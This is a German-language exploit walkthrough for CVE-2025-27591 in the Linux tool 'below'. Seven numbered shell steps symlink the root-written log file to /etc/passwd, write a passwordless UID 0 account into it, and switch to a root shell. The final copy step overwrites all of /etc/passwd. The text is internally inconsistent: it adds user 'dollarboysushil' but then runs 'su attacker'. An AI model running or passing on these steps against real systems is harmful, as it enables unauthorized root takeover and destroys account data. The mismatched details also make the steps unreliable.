
CVE-2025-27591 ist eine bekannte Privilegieneskalations-Schwachstelle im Below Service (Version < v0.9.0)
belowDies ist ein einfacher Exploit für CVE-2025-27591, eine lokale Privilegienausweitungs-Schwachstelle im Linux-Systemüberwachungstool below. Die Schwachstelle betrifft Versionen vor v0.9.0 und resultiert aus falschen Berechtigungszuweisungen im System. Das Problem wurde im Januar 2025 entdeckt und am 12. März 2025 öffentlich bekannt gegeben (SecurityOnline, OpenWall). Wenn below mit sudo ausgeführt wird, kann es Fehler in ein weltweit beschreibbares Verzeichnis (/var/log/below) protokollieren, was Angreifern ermöglicht, eine Logdatei mit einem Symlink auf sensible Ziele wie /etc/passwd zu verweisen.
Durch Ausnutzung dessen kann ein unprivilegierter Benutzer mit sudo-Zugriff auf below Privilegien auf root ausweiten.
belowbelow record/var/log/below/error_root.log/var/log/below ist weltweit beschreibbarsudo /usr/bin/below record ohne Passwort ausführen✅ Schritt 1: Überprüfen Sie, ob das Log-Verzeichnis weltweit beschreibbar ist Sie sollten Folgendes sehen:
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ Schritt 2: Entfernen Sie eine vorhandene error_root.log
rm -f /var/log/below/error_root.log
✅ Schritt 3: Erstellen Sie einen Symlink auf /etc/passwd
ln -s /etc/passwd /var/log/below/error_root.log
dann überprüfen mit
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

✅ Schritt 4: Erstellen Sie eine Payload-Datei Dies fügt einen neuen root-Benutzer attacker ohne Passwort hinzu:
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
Dateistruktur
username:password:UID:GID:comment(home/full name):home_directory:shell
Wichtig hier sind UID und GUID
Wir setzen UID und GUID auf 0, wodurch der Benutzer ein root-Benutzer wird und die Gruppen-ID = root-Gruppe ist

✅ Schritt 5: Lösen Sie einen Log-Schreibvorgang als root aus Dies ist der Kern des Exploits.
sudo /usr/bin/below record
Dieser Befehl wird voraussichtlich fehlschlagen oder ein Timeout verursachen – aber er wird versuchen, Fehlerprotokolle in /var/log/below/error_root.log zu schreiben, was tatsächlich /etc/passwd ist. 💡 In manchen Fällen kann dies allein /etc/passwd beschädigen – daher überschreiben wir es als nächstes vollständig.
✅ Schritt 6: Überschreiben Sie /etc/passwd über den Symlink
cp /tmp/payload /var/log/below/error_root.log

✅ Schritt 7: Werden Sie root
su attacker
Sie gelangen in eine root-Shell, kein Passwort erforderlich.

python3 dbs_exploit.py
